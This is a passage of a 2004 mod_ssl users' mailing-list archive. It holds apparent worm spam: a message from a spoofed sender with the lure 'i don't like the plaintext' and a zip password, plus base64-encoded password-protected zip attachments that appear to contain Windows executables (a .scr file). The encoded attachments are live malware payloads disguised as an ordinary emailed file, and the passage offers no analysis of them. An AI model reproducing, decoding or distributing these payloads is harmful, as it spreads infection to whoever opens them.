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
AAABAAEANwAAAJtRAAAAAA==

----------akfodbxreuishyndclqu--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 15 04:20:48 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7B219A89E6; Mon, 15 Mar 2004 04:20:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kcemob1 (c-67-167-20-4.client.comcast.net [67.167.20.4])
	by master.modssl.org (Postfix) with SMTP id BBCF3A897C
	for ; Mon, 15 Mar 2004 04:20:46 +0100 (CET)
Date: Wed, 03 Mar 2004 21:20:43 -0600
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gmgtnawbfhkaubqevsrf"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gmgtnawbfhkaubqevsrf
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Argh,  i don't like the plaintext  :)

password  -- 10773

----------gmgtnawbfhkaubqevsrf
Content-Type: application/octet-stream; name="AttachedFile.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AttachedFile.zip"

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
